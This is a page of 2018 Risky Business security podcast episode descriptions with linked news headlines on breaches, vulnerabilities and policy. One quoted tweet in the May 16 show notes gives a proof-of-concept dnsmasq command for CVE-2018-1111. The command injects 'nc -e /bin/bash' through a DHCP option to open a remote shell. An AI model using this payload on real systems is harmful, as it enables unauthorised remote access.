DPRK's Shadow Sector report

Risky Business #502 -- Inside China's hacker scene

Jun 6, 2018


On this week’s show we chat with Peter Wesley. Peter’s well known around the Australian security scene, but a few years back he relocated to China, where security is booming. He did a presentation at the AusCERT conference on the Gold Coast last week all about the Chinese hacker scene and security industry. He joins us in this week’s feature interview to tell us about how the Chinese scene evolved and what its current relationship with the Chinese government looks like.

This week’s sponsor interview is a cracker. We’ll be joined by Ryan Kalember, Senior Vice President of Strategy with Proofpoint, the email filtering company. Ryan is along to talk about a phenomenon the Proofpointers are very interested in – we’ve all heard of VIPs, but he’s here to talk about VAPs – Very Attacked People.

So much attacker behaviour these days is driven by email-based attacks, and the people getting hit the most with this sort of stuff might not be the ones you expect. Ryan joins us later on for that conversation in this week’s sponsor interview, with thanks to Proofpoint.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes
What Will Microsoft's GitHub Buy Mean For Controversial Code? | WIRED
A host of new security enhancements is coming to iOS and macOS | Ars Technica
Apple Is Testing a Feature That Could Kill Police iPhone Unlockers - Motherboard
Microsoft Adds Post-Quantum Cryptography to an OpenVPN Fork
Oracle WebLogic RCE Deserialization Vulnerability (CVE-2018-2628) - DZone Security
Data from 92 million accounts stolen from DNA testing site MyHeritage
Hacker Defaces Ticketfly’s Website, Steals Customer Database - Motherboard
SS7 routing-protocol breach of US cellular carrier exposed customer data | Ars Technica
Judge dismisses Kaspersky lawsuits, U.S. government ban will stand
Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'
Former DIA official allegedly sold secrets to China, including possible Cyber Command information
ICANN Launches GDPR Lawsuit to Clarify the Future of WHOIS | Threatpost | The first stop for security news
With possible summit approaching, North Korean espionage hacks continue | Ars Technica
Synack offers free penetration testing for election systems ahead of 2018 midterms
CrowdStrike announces $1 million warranty for breaches that happen under its watch
IE Zero-Day Adopted by RIG Exploit Kit After Publication of PoC Code
CVE-2018-8174 | Windows VBScript Engine Remote Code Execution Vulnerability
Chrome and Firefox leaks let sites steal visitors’ Facebook names, profile pics | Ars Technica
Zip Slip Vulnerability Affects Thousands of Projects Across Multiple Ecosystems
Malicious Git Repository Can Lead to Code Execution on Remote Systems
The NSA Just Released 136 Historical Propaganda Posters - Motherboard
NSA Security Posters 1950s-1970s - Album on Imgur

Risky Business #501 -- Trisis: signalling, deterrence or escalation?

May 30, 2018


On this week’s show we’ll be talking about a whole bunch of stuff: the FBI taking down a botnet in a very FBI way, and a deep dive on the Trisis malware popping up in the US following America’s withdrawal from the so-called Iran agreement. We also look at the latest in the crypto debate, breaches, bugs and more!

We’ll hear from Tom Uren of the Australian Strategic Policy Institute (ASPI) on the Trisis side of things. Tom worked in an interesting place in Australia’s defence department, but these days he spends his days think tanking for ASPI. He shares his thoughts on what it is Iran could be up to with Trisis.

This week’s show is brought to you by: Australia!

AustCYBER is a government-supported industry group here that is trying to get the Australian cybersecurity industry organised. There’s the VC-backed US model, the Israeli model of building a “cyber city” in the desert, and then there’s the Australian model, which is actually quite different. It’s much more about helping local startups win deals locally, then internationally, to get them on a path to profitability so they don’t have to sign the awful term sheets Australian VCs put in front of them.

Well, there’s more to it than that, but AustCYBER head honcho Michelle Price will be along in this week’s sponsor interview to walk us through what she’s trying to do for the Australian security industry and how foreign multinational companies can also benefit from that.

Show notes
Exclusive: FBI Seizes Control of Russian Botnet
Cisco's Talos Intelligence Group Blog: New VPNFilter malware targets at least 500K networking devices worldwide
Robᵉʳᵗ Graham 🤔 on Twitter: "This advice from the FBI is best described as "moronic". It advised 126 million households in the U.S. to reboot their routers in order to address a botnet of 500,000 devices located mostly outside the U.S."
FBI: Kindly Reboot Your Router Now, Please — Krebs on Security
FBI shuts down domain behind Russian 'VPNFilter' botnet
Researchers uncover sophisticated botnet aimed at possible attack inside Ukraine
Trisis masterminds have expanded operations to target U.S. industrial firms
U.S. industry experts call for vigilance after Trisis group goes global
In the dark about 'going dark'
Encryption advocates rip FBI over inflated encrypted device statistics
Apple reports spike in national security requests amid promises of more transparency
Why Is Your Location Data No Longer Private? — Krebs on Security
The U.S. military combined cyber and kinetic operations to hunt down ISIS, general says
Hacker linked to Russian intelligence sentenced to five years in prison
Cyber crooks claim to hit two big Canadian banks | Reuters
Chinese researchers warn blockchain company EOS about 'epic' vulnerability in soon-to-launch platform
No one is updating their Android devices, new data shows
Oracle Plans to Drop Java Serialization Support, the Source of Most Security Bugs
3 Charged In Fatal Kansas ‘Swatting’ Attack — Krebs on Security
Russian unit, GRU officer linked to 2014 shoot-down of airliner over Ukraine | Ars Technica
Cyber Security Growth Network - Australian Cyber Security Growth Network

Risky Biz Soap Box: Kill your own meat with EclecticIQ

May 28, 2018


Soap Box is not our regular weekly show, it’s the monthly podcast here at Risky Biz HQ where vendors pay to come on to the show to talk about what it is they actually do.

Before EclecticIQ sponsored this edition, to be honest, I didn’t really know much about them. All I knew is that their positioning was very much around “threat intelligence,” which, as regular listeners would know, are two words that are usually followed by “derpa derpa” on the regular Risky Business podcast.

BUT! Here’s the thing. EclecticIQ don’t sell a “blinky light” box that receives a creaky feed of 12-month-old IOCs. They sell their solution to either massive organisations or very high risk organisations. They could be national cyber security centres, entire defence departments, very, very big enterprises; basically anyone that has an intelligence team and multiple constituent departments or agencies. They also play in ultra high risk sectors like defence contracting.

The EclecticIQ platform isn’t for small organisations. It really is for orgs that have dedicated, externally-focussed intelligence teams. Their play isn’t “we feed you threat intelligence,” it’s “use our tooling to go and get your own threat intelligence, develop a strategy for dealing with the resulting product, then distribute the strategy that flows from that process to the relevant people in your organisation.” I like to think of this approach as “killing your own meat”. That’s what EclecticIQ is all about. They give you the shotgun and a map, the last known locations of the deer, a cool room and a bunch of cleavers. Delicious. Apologies to any vegetarians listening for that metaphor.

Joep Gommers is our guest. He is the founder and CEO of EclecticIQ. Prior to founding EclecticIQ, Joep served as Head of Global Collection and Global Intelligence Operations at iSIGHT Partners, which was, of course, acquired by FireEye. Joep joined me to talk about what it is that EclecticIQ actually does, and the resulting conversation, I hope, will be interesting to anyone who wants to understand how threat intelligence is developed and disseminated at scale.

There’s a link to EclecticIQ’s website below, and you can follow Joep Gommers on Twitter here.

Show notes
Cyber Threat Intelligence analysis | EclecticIQ

Risky Business #500 -- Web asset discovery is getting useful

May 23, 2018


In this week’s feature interview we’ll be chatting with Shubham Shah and his friend Lord Tuskington about continuous asset discovery’s impact on testing methodologies. Shubs has worked as both a pentester and as a very successful bug bounty hunter. In fact he’s built an entire asset discovery platform that he and his buddies have been using to rip crazy amounts of cash out of bounty programs over the last few years and he’s turning that platform into a product. So I wanted to talk to him about that, but I also wanted to get a pentester’s perspective on how this type of continuous asset discovery tech could change the testing industry.

This week’s show is brought to you by Exabeam, a next generation SIEM company! And it’s amazing how nicely this week’s feature and sponsor interviews dovetail, actually, because Exabeam’s Steve Gailey will be along in this week’s sponsor interview to have a chat about how SIEM technology has changed much faster than SOC operations methodologies. Basically everyone has structured their operations around three levels of response, and the workflows are so ingrained that nobody seems to know what to do with a next generation SIEM.

Adam Boileau is also along, like always, to talk about the week’s security news.

The show notes/news items are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes
Alleged CIA Leaker Joshua Schulte Has Some of the Worst Opsec I’ve Ever Seen - Motherboard
Accused CIA leaker Joshua Schulte accused of more leaks
Alleged CIA Leaker Tweeted That Chelsea Manning ‘Should Be Executed’ - Motherboard
Trump feels presidential smartphone security is “too inconvenient” | Ars Technica
Trump, Chinese leaders moving forward on deal to save ZTE - The Washington Post
House measure asks DHS to share info on potential ZTE cyberthreat
Potential Trump deal to ease sanctions on China's ZTE riles Congress
Revealed: Pentagon Push to Hack Nuke Missiles Before They Launch
Banks Adopt Military-Style Tactics to Fight Cybercrime - The New York Times
Inside 'Project Indigo,' the quiet info-sharing program between banks and U.S. Cyber Command
Hacker Breaches Securus, the Company That Helps Cops Track Phones Across the US - Motherboard
LocationSmart bug allowed for leak of location data for nearly any U.S. phone - CyberScoop
Who's Afraid of Kaspersky? - Motherboard
New speculative-execution vulnerability strikes AMD, ARM, and Intel | Ars Technica
After Arrest in Serbia, Netflix Hackers ‘The Dark Overlord’ Say They’re Still Going - Motherboard
Cisco's Talos Intelligence Group Blog: TeleGrab - Grizzly Attacks on Secure Messaging
North Korea-tied hackers used Google Play and Facebook to infect defectors | Ars Technica
The Wayback Machine is Deleting Evidence of Malware Sold to Stalkers - Motherboard
Latvian national convicted of running 'VirusTotal-for-criminals' malware scanner
Alphabet's Jigsaw offers political campaigns free DDoS protection
T-Mobile Employee Made Unauthorized ‘SIM Swap’ to Steal Instagram Account — Krebs on Security
Karin Kosina on Twitter: "So the guy behind the Carbanak malware that stole hundreds of millions of dollars? He was caught because he bought a car for 70k and didn't pay the bill. Can't make this sh** up :) #opsec #fail"
GPON Routers Attacked With New Zero-Day
Cisco fixes critical ‘DNA’ software flaws
Pakistan: Campaign of hacking, spyware and surveillance targets human rights defenders | Amnesty International
AUSTRALIA'S DEADLIEST ANIMALS - SONG - YouTube

Risky Business feature interview: Hacking PUBG

May 18, 2018


Here it is – this week’s feature interview with Marisa Emerson! Marisa is a security researcher who did a great talk at BSides Canberra in March all about game cheating.

She was specifically talking about the cheating techniques PUBG gamers are using and just how advanced they are. The crazy thing is the cheaters here are rolling some pretty decent techniques. It’s reminiscent of the iPhone jailbreaking scene – a lot of good hackers who don’t know they’re good hackers.

Marisa is running a binary exploitation bootcamp in Brisbane that will have another session next semester. Details are here.

Show notes
Marisa's binary bootcamp in Brisbane

Risky Business #499 -- Is PGP actually busted and Signal pwnt? Noooope

May 16, 2018


In this week’s weekly show we’re just going to drill in to the week’s extra long security news section with Adam Boileau then go straight to the sponsor interview. I’ve got a fantastic feature interview for you this week, but I’m going to publish it outside of the news show. It was either that or run stupidly long or cut too much from everything to make it all fit.

This week’s sponsor interview is a good one though. We’re chatting with the team behind DarkTrace. They make a machine learning-backed network monitor. A key difference with this kit is it actually gets involved on the network. If it sees something it’s confident is attacker behaviour it will start spraying TCP resets to boot them off the network.

This is something the IPS systems of old used to do but it’s an approach that fell out of favour. We’ll find out why that approach was discarded and why it’s coming back, as well as generally discuss the role of machine learning in security with a company that has invested in it heavily. This isn’t a “for or against” interview segment. This is a discussion with one company that is getting value out of the approach, so stick around for that.

The show notes/news items are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes
Without Nuclear Deal, U.S. Expects Resurgence in Iranian Cyberattacks - The New York Times
How Two Persian Gulf Nations Turned The US Media Into Their Battleground
National Security Council delays publication of cyber strategy over inclusion of 'offensive' measures
Bolton eliminates White House Cybersecurity Coordinator position
Lawmakers introduce bill to save top White House cyber job after Bolton eliminated it
Ex-CIA employee identified as suspect in 'Vault 7' leaks
Sebastian Schinzel on Twitter: "We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. #efail 1/4"
'Efail' exploit can decrypt old emails that were previously encrypted - CyberScoop
Critical PGP and S/MIME bugs can reveal encrypted emails—uninstall now [Updated] | Ars Technica
CVE-2018-1000136 - Electron nodeIntegration Bypass
Security flaw in Electron impacts hundreds of desktop apps
Michael Gianarakis on Twitter: "I don’t know man - as I said I wasn’t involved so I don’t know what was tested and when, what was covered during disclosure etc. All I was saying in my original tweet was that I didn’t read the post to say any specific app was vulnerable or not.…"
Alfredo Ortega on Twitter: "Remote zero-click JavaScript code execution on signal desktop message app. Thanks @HacKanCuBa and @julianor"
Alfredo Ortega on Twitter: "And we'll release the Signal-Desktop Remote code exec advisory (CVE-2018-10994) in some hours. Not a good week for privacy software."
It only took five hours to close a critical vulnerability in Signal's desktop client
'Disappearing' Signal Messages Are Stored Indefinitely on Mac Hard Drives - Motherboard
China's ZTE says main operations have ceased after US ban
Lucas Tomlinson on Twitter: "JUST IN: Pentagon orders all stores on U.S. military bases worldwide to ban phones and telecom equipment from Chinese companies Huawei and ZTE, following warnings from top U.S. intelligence officials the Chinese companies could be spying on Americans"
Donald J. Trump on Twitter: "President Xi of China, and I, are working together to give massive Chinese phone company, ZTE, a way to get back into business, fast. Too many jobs in China lost. Commerce Department has been instructed to get it done!"
Microsoft Enabling Javascript in Excel Has Security Pros Anxious | WIRED
Researcher Runs Coinhive Cryptominer in Excel Just Days After Microsoft Announces JavaScript Custom Functions
Researchers Come Up With a Way to Launch Rowhammer Attacks via Network Packets
Georgia governor vetoes cyber bill that would criminalize “unauthorized access” | Ars Technica
Russian Troll Farm Hijacked American Teen Girls’ Computers for Likes
Dutch ditch Kaspersky on fears of Russian government influence
Possible Kaspersky sanctions meet resistance inside U.S. government
Wyden calls for FCC investigation into cell-phone tracking used by law enforcement
Kia‏☆ on Twitter: "this isnt a joke, try out, you can find the current location of a phone (not just with cell tower info, it can force AGPS) with just *its phone number*; the demo site requires you reply to an SMS but there's no technical requirement against that!"
Government would be barred from mandating crypto backdoors under House bill
Symantec's stock plummets after announcement of internal audit
Lawmakers call for action following revelations that APT28 posed as ISIS online
Counterrorism Officials Concerned About Technological Advances of Jihadists in the US
Vigilante Hacks Government-Linked Cyberespionage Group - Motherboard
Pakistani military leverages Facebook Messenger for wide-ranging spyware campaign
DDoS Attacks Leverage UPnP Protocol to Avoid Mitigation
Shadowy Hackers Accidentally Reveal Two Zero-Days to Security Researchers
Windows 10 OpenSSH Client Installed by Default in April 2018 Update
Malicious Apps Get Back on the Play Store Just by Changing Their Name
Multiple OS Vendors Release Security Patches After Misinterpreting Intel Docs
Barkın Kılıç on Twitter: "#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=,,1h --conf-file=/dev/null --dhcp-option=6, --dhcp-option=3, --dhcp-option="252,x'&nc -e /bin/bash 1337 #" cc: @cnbrkbolat…"
Morning mail: Ecuador's costly Assange spy operation | Australia news | The Guardian
Evil Mainframe Penetration Testing Classes
Evil Mainframe: Mainframe Penetration Testing Registration, Tue, Jun 12, 2018 at 9:00 AM | Eventbrite
Darktrace

Risky Business #498 -- There sure is a lot of Microsoft Defender out there these days

May 9, 2018


On this week’s show we’re taking a look at some recent data out of Microsoft trumpeting its Defender antivirus install figures on Windows. They’ve got 18% market share on Windows 7/9 and 50% on Win10.

For the AV and endpoint security industry Microsoft has always been the existential threat, but has the plane flown into the mountain already? We’ll speak with Securosis analyst and DisruptOps founder Rich Mogull about that in this week’s feature interview.

In this week’s sponsor interview we’re joined by the always entertaining Haroon Meer of Thinkst Canary. When we spoke Haroon had just wrapped up his first ever booth at the RSA conference. He’ll join us this week to tell us, surprisingly, that it was a really worthwhile exercise for Thinkst, but as you’ll hear he also thinks the broader industry can be a pack of dumbasses when it comes to actually marketing tech at events like RSA. If he becomes global ruler RSA booths will be gimmick-free and just show people product demos.

The show notes/news items are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes
BREAKING: Documents show how provincial employees misled Halifax police in the FOIPOP security failure
FTC urges Twitter users to change passwords | TheHill
Iran nuclear deal: Trump pulls US out in break with Europe allies - BBC News
Patrick Gray on Twitter: "There are teams workshopping ideas like this in Tehran right now, guaranteed. Personally I'm more worried about Iranian ICS hax. They've gotten good at that stuff.…"
Caroline O. on Twitter: "NEW: The Senate Intelligence Committee released its prelim findings into Russian targeting of election infrastructure during the 2016 election. "In a small # of states, Russian-affiliated cyber actors were in a position to, at a minimum, alter or delete voter registration data."…"
Facebook security analyst is fired for using private data to stalk women | Ars Technica
Sources: Facebook Has Fired Multiple Employees for Snooping on Users - Motherboard
Drive-by Rowhammer attack uses GPU to compromise an Android phone | Ars Technica
Android App With 10 Million Downloads Left Users’ Photos and Audio Messages Exposed to Public - Motherboard
Hundreds of big-name sites hacked, converted into drive-by currency miners | Ars Technica
Report: Chinese government is behind a decade of hacks on software companies | Ars Technica
Over 10,000 companies downloading software vulnerable to Equifax hack
European Central Bank proposes framework to strengthen financial system’s defenses
Hysteria over Jade Helm exercise in Texas was fueled by Russians, former CIA director says | The Texas Tribune
Defector: WikiLeaks ‘Will Lie to Your Face’
SiliVaccine: Inside North Korea’s Anti-Virus - Check Point Research
You Can Finally Encrypt Slack Messages So Your Boss Can't Read Them - Motherboard
Microsoft May 2018 Patch Tuesday Fixes 67 Security Issues, Including IE Zero-Day
Vulnerabilities Affecting Over One Million Dasan GPON Routers Are Now Under Attack
He Fled a Prison in Iceland. Now It’s Good to Be Back. - The New York Times
Report: Software bug led to death in Uber’s self-driving crash | Ars Technica
Carbon Black stocks close 26 percent up on first day of public trading
Why Windows Defender Antivirus is the most deployed in the enterprise – Microsoft Secure
thinkst Thoughts...: Considering an RSAC Expo booth? Our Experience, in 5,000 words or less

Risky Biz Soap Box: Root9b on agentless threat hunting

May 4, 2018


In this edition of Soap Box we’re chatting with Root9b. They’ve just launched an updated version of their ORION platform. And I guess the way you’d describe Root9b is as a threat hunt product maker and managed threat hunt provider. And their approach is a bit different – their software is agentless. They basically authenticate to a machine, inject various payloads into memory, and use that to pull back all sorts of telemetry from machines.

They say this means it’s much less likely that attackers will see them, and they offer this as a product, ORION, or as a service. They say their managed services customers come to them because they’re pretty unhappy with their MDR and MSSP providers and want better signalling.

So I was joined by John Harbaugh, COO of Root9b, and Mike Morris, CTO. Both of these guys were US Air Force cyberdudes before jumping out to the private sector. The company actually started off doing training before developing their platform ORION.

John and Mike joined me by Skype for this podcast. Enjoy!

Show notes
Hottest cybersecurity products at RSA 2018 | CSO Online
Our Cyber Security Software | root9B
General Michael Hayden Joins root9B Advisory Board | root9B
root9b_follow_up_report_apt28.pdf

Risky Business #497 -- Silvio's greatest hits

May 2, 2018


This week’s Risky Business is kind of going back to its roots a bit. As much as we love talking about policy and the intersection of cyber security with global affairs, sometimes it pays to remember that computer security is actually about computers.

With that in mind this week we’ve got two fantastic interviews for you. We’ll be chatting with Dr. Silvio Cesare in this week’s feature interview. Silvio’s dusted off his bug hunting hat and he’s taken to Twitch-streaming his auditing sessions. Dave Aitel described watching Silvio’s Twitch stream as like seeing a Titan ransack a small Greek village. Five months, 100 bugs, 50 of them in kernel stuff.

He’s doing this for a couple of reasons – he wants to show people how it’s done, and he wants people to realise there are still lots of bugs out there to be found. We’ll chat to him about that in this week’s feature.

This week’s sponsor interview is with another old school hacker, Stephen Ridley. Stephen is the founder of Senrio, which is technically an IoT security play, but the thing is the tech he’s developed has turned out to be useful for all sorts of other stuff too.

Senrio is another one of those hacker-led startups in the spirit of Duo Security or Thinkst Canary. Stephen is a really well respected guy and this week he’s joining us to talk about a bunch of stuff. A lot of it is related to the unexpected uses for Senrio’s monitoring platform. He built a classifier for network-connected devices as a part of Senrio’s IoT security platform, and it turns out it’s actually running rings around a bunch of Enterprise Asset Management tools. People are actually using his IoT security monitoring solution to do asset management and figure out install gaps for their EDR solutions.

Totally not what he intended people to use it for, but hey, a win’s a win. So Stephen joins us this week to talk about that, also to talk about recent developments in the IoT space and really a bunch more stuff.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes
Amazon Web Services starts blocking domain-fronting, following Google’s lead - The Verge
Iran blocks Telegram, pushes replacement with “Death to America” emoji | Ars Technica
Chinese Authorities Accidentally Admit to Accessing Deleted WeChat Messages
As two Koreas shake hands, Hidden Cobra hackers wage espionage campaign | Ars Technica
North Korea's Elites Are Ditching Facebook for Chinese Social Networks
After data “clash” report, WhatsApp founder says he’s leaving Facebook | Ars Technica
Can This System of Unlocking Phones Crack the Crypto War?
Ray Ozzie’s plan for unlocking encrypted phones gets a chilly reception | Ars Technica
Matthew Green on Twitter: "This article on WhatsApp suggests that WhatsApp might be weakening its encryption, but doesn’t give any details. That’s pretty worrying."
Tens of Thousands of Malicious Apps Using Facebook APIs | Threatpost | The first stop for security news
Intel Committee blasts FBI for not notifying Russian hacking victims - Cyberscoop
Startup Offers $3 Million to Anyone Who Can Hack the iPhone - Motherboard
This Russian Company Sells Zero-Day Exploits for Hospital Software - Motherboard
Google and Microsoft ask Georgia governor to veto 'hack back' bill
Joy Reid Blames Hackers, Just Like Everyone Else | WIRED
Security Trade-Offs in the New EU Privacy Law — Krebs on Security
A One-Minute Attack Let Hackers Spoof Hotel Master Keys | WIRED
Volkswagen and Audi Cars Vulnerable to Remote Hacking
Charlie Miller on Twitter: "Cool new research out on car hacking: Hang on or mute as I'll give my thoughts on it."
Lojack Becomes a Double-Agent
Europol shuts down one of the largest DDoS marketplaces in the world - CyberScoop
Police Have Seized Revenge Porn Site Anon-IB - Motherboard
Chinese Police Arrest 15 People Who Hid Malware Inside PUBG Cheat Apps
GitHub Accidentally Recorded Some Plaintext Passwords in Its Internal Logs
Starting Today, Google Chrome Will Show Warnings for Non-Logged SSL Certificates
Long Prison Sentence for Man Who Hacked Jail Computer System to Bust Out Friend
State threat-sharing center warns of multiple PHP vulnerabilities - CyberScoop
Escalating Privileges with CylancePROTECT — Atredis Partners
Hackers Scan the Web for Vulnerable WebLogic Servers After Oracle Botches Patch
silviocesare - Twitch
Senrio

Risky Business #496 -- The China supply chain problem

Apr 25, 2018


On this week’s show we hear from Jennifer Bisceglie, the CEO of Interos Solutions, a company that recently prepared a report on supply chain security for the US government’s US-China Economic and Security Review Commission. Risky Business contributor Brian Donohue caught up with Jennifer to talk about the report and really get an idea of what supply chain risks look like from a macro level. The long and the short of it is the supply chain is already very, very opaque, so governments and the private sector will have to work pretty hard to mitigate the risks involved here.

This week’s show is brought to you by Netsparker, the web application security scanning toolmaker. Netsparker was founded nine years ago by this week’s sponsor guest, Ferruh Mavituna. He was a pentester who created Netsparker to help him with his own work. But just recently they raised a bundle of cash: US$40m. We’ll catch up with him and find out if a webapp scanning company with $40m is like the mule with the spinning wheel. It certainly seems like Ferruh has some ambitious plans. We haven’t seen this sort of money being raised by comparable companies so it’s definitely interesting stuff.

In this week’s news we cover off:

Mysterious BGP route hijacking for lame Ether theft (??)
Google disabling domain fronting
Canadian teen charged with downloading documents from a website
City of Atlanta spending $2.6m to recover from its ransomware event
RSA’s conference app fail
White House chaos over Rob Joyce replacement (MAGA!!! MAGAAAAAA!!!!!)
Much more

The show notes/links are below, and you can follow Adam, Brian or Patrick on Twitter if that’s your thing.

Show notes
Suspicious event hijacks Amazon traffic for 2 hours, steals cryptocurrency | Ars Technica
Google disables domain-fronting, removing ability to bypass state-level firewalls - Neowin
Teen charged in Nova Scotia government breach says he had 'no malicious intent' | CBC News
Atlanta Spent $2.6M to Recover From a $52,000 Ransomware Scare | WIRED
Seamus Hughes on Twitter: "A beautiful circle: Company gets ransomwared. Hires IT company to fix it. Unlocks system in record time. FBI figures out the IT company just paid the bitcoin ransom.…"
Nation-state hackers attempted to use Equifax vulnerability against DoD, NSA official says
Richard Bejtlich on Twitter: "A million times, this. The "basic cyber hygiene" thesis drives me crazy. It's the epitome of static, time-ignorant thinking. "Hygiene" may work against mindless one-shot malware, or one-trick pony script kiddies. It has no place in serious conversations about targeted intrusions.…"
DNC Lawsuit Against Russia Reveals New Details About 2016 Hack | WIRED
(tech)Darko||Dan on Twitter: "Apparently @RSAConference isn't giving out maps to Expo attendees anymore - they require you to install their app which wants access to everything short of installing a rootkit on your phone. Are you kidding me @RSAsecurity?…"
RSA conference app leaks user data
SEC fines Yahoo remnant Altaba $35 million for failing to disclose breach
These Ex-Spies Are Harvesting Facebook Photos For A Massive Facial Recognition Database
The Cat-and-Mouse Game Between Apple and the Manufacturer of an iPhone Unlocking Tool - Motherboard
Someone Is Trying to Extort iPhone Crackers GrayShift With Leaked Code - Motherboard
The NSA now officially has a new chief
Trump sends cyberwar strategy to Congress
A cybersecurity power struggle is brewing at the National Security Council
Microsoft-led industry group pledges to not assist government cyberattacks - Cyberscoop
Kaspersky Lab banned from advertising on Twitter
U.S. government weighing sanctions against Kaspersky Lab
Sentencing delayed for FSB's email-popping hacker pawn
Introducing Microsoft Azure Sphere: Secure and power the intelligent edge | Blog | Microsoft Azure
“Drupalgeddon2” touches off arms race to mass-exploit powerful Web servers | Ars Technica
‘Orangeworm’ hacking campaign hits X-ray and MRI machines
Icelandic bitcoin heist suspect arrested in Amsterdam after leaving prison | Ars Technica
A bunch of Red Pills: VMware Escapes | Keen Security Lab Blog
Spoofing Cell Networks with a USB to VGA Adapter | Hackaday
Google Translate
Avast reveals more information detailing how hackers compromised CCleaner | V3
New hacks siphon private cryptocurrency keys from airgapped wallets | Ars Technica
[TITLE] - AARP Research Report

Risky Business #495 -- Russian Internet users are having a bad time

Apr 18, 2018


We’re still running in a trimmed down format this week, sorry about that. Regular listeners would know we’ve been dealing with some unexpected stuff over here in the house of Business, but the good news is things have settled down and we’re actually back home after more than three weeks away. Things are looking good for a return to a full format show either next week or the week after.

But don’t worry, there’s plenty of good stuff in this week’s news segment with Mark Piper, including:

Russia blocking 15m cloud service IPs to shut down Telegram
RU router hax: Are they a big deal?
FBI’s “going dark” narrative questioned
Rob Joyce departs White House
ZTE in all sorts of trouble
AND MOAR

This week’s show is brought to you by Cylance. Jim Walter of Cylance will be along in this week’s sponsor interview to talk about a couple of things – we’ll be looking at “fileless” malware – for what it’s worth it’s a term that we both hate – and we’ll also be talking about how complete amateurs are now able to run reasonably sophisticated malware campaigns these days thanks to the badware for hire business getting even more slick.

The show notes/links are below, and you can follow Pipes or Patrick on Twitter if that’s your thing.

Show notes
In effort to shut down Telegram, Russia blocks Amazon, Google network addresses | Ars Technica
Anatoly Rosencrantz on Twitter: "over night russian authorities are blocking about 2 000 000 IPs of Amazon and Google. Everyone thought it’s a mistake, until RKN head Zharov confirmed it is not. Tactics: to force Google and Amazon push Telegram out of their clouds by blocking basically whole cloud for Russia…"
US, UK Accuse Russia of Hacking Home Routers and ISPs to Conduct MitM Attacks
Lawmakers Call FBI's 'Going Dark' Narrative 'Highly Questionable' After Motherboard Shows Cops Can Easily Hack iPhones - Motherboard
Congress wants answers on FBI's 'going dark' problem in wake of DOJ IG report
Cybersecurity adviser Rob Joyce to leave White House, return to NSA
Bolton will lead charge to replace cybersecurity coordinator, DHS secretary says
Rob Joyce on Twitter: "EU's GDPR is going to undercut a key tool for identifying malicious domains on the internet. WHOIS database will be noncompliant, or have to purge the data that makes it useful to find bad actors. @briankrebs is spot on. Cyber criminals are celebrating GDPR.…"
Update: Zuckerberg Said He ‘Misspoke’ About Alerting Campaigns to Russian Hacking Attempts - Motherboard
Deleted Facebook Cybercrime Groups Had 300,000 Members — Krebs on Security
Intel to Allow Antivirus Engines to Use Integrated GPUs for Malware Scanning
Chinese Mobile Device Maker ZTE Banned From Buying U.S. Goods
Hamas-linked spyware targeting Palestinians removed from Google Play store
FTC: "Warranty Void If Removed" Stickers Are Illegal
Barclays Bank plc - ASA | CAP
NIST releases updated cybersecurity framework
Researchers Rickrolled Emergency Alert Sirens in Proof-of-Concept Hack - Motherboard
Exploitation of Drupalgeddon2 Flaw Starts After Publication of PoC Code
Yubico Delivers Passwordless Login for Enterprise Authentication on Windows 10 Devices | Yubico
The Teens Who Hacked Microsoft's Xbox Empire—And Went Too Far | WIRED
Senior Manager of Research and Development: Careers | Duo Security
Welcome to Mars
Cylance | Artificial Intelligence Based Advanced Threat Prevention

Risky Business #494 -- Cisco customers have a bad week, plus a deep dive on WebAuthn

Apr 10, 2018


Regular listeners would know Risky Business is just running the news and sponsor segments at the moment so there’s no feature interview in this week’s show. But that’s fine because we’ve got plenty to get through in the news segment with Adam Boileau.

Then we’ve got a killer sponsor interview for you this week with Nick Steele and James Barclay of Duo Security.

They’re here to talk about WebAuthn. It’s the new authentication spec currently going through the W3C process. Both Nick and James will be along later to talk about what the spec is designed to do, how it works and what its chances of becoming mainstream are, and spoiler alert, those chances are pretty good.

They’ve also provided me with some links for people out there who want to play around with WebAuthn; they are below.

Links to all the news items are also below, and you can follow Patrick or Adam on Twitter if that floats your boat.

Show notes
Nation-state hackers hit Cisco switches - Cyberscoop
"Don’t Mess With Our Elections": Vigilante Hackers Strike Russia, Iran - Motherboard
With trade war looming, Chinese cyberattacks may follow - CyberScoop
Police could access US cloud data under planned crime-fighting deal
DHS defends media-monitoring database, calls critics “conspiracy theorists” | Ars Technica
Alex Ionescu on Twitter: "I generally wasn't opposed to the idea of Chrome making sure that people's documents/downloads weren't full of latent ransomware. But pegging my CPU as you run... f*cking... ESET... on my entire drive? I'm glad I switched to Edge on my desktop PC, I guess it's time for the laptop"
After Crackdown, Neo-Nazis Are Hosting Propaganda on Censor-Proof Networks - Motherboard
Chinese Government Forces Residents To Install Surveillance App With Awful Security - Motherboard
A Long-Awaited IoT Crisis Is Here, and Many Devices Aren't Ready | WIRED
DARPA is looking to avoid another version of Meltdown or Spectre - CyberScoop
This Tool Can Help Identify Leakers Who Copy and Paste Secret Info - Motherboard
T-Mobile Stores Part of Customers' Passwords In Plaintext, Says It Has 'Amazingly Good' Security - Motherboard
Beware of Bing Chrome Download Ads Pushing Adware/PUP Installers
Three Execs Get Prison Time for Pirating Oracle Firmware Patches
Russia Readies Telegram Ban After App Refused to Hand Over Encryption Keys to FSB
VirusTotal Launches Droidy, Its New Android Sandbox Technology
Researchers Hijack Over 2,000 Subdomains From Legitimate Sites in CloudFront Experiment
Tavis Ormandy on Twitter: "This is amazing, Windows Defender used the open source unrar code, but changed all the signed ints to unsigned for some reason, breaking the code. @halvarflake noticed and got it fixed. Remote SYSTEM memory corruption 😨"
Australia's Offensive Cyber Capability | Australian Strategic Policy Institute | ASPI
Josh Marshall on Twitter: "oh look "security expert" Rudy Giuliani shows you how to do a special "dark web scan", courtesy of Experian."
GitHub - duo-labs/webauthn: A Demonstration of the WebAuthn Specification
GitHub - duo-labs/py_webauthn: A WebAuthn Python module.
ImperialViolet - Security Keys
Web Authentication: An API for accessing Public Key Credentials Level 1
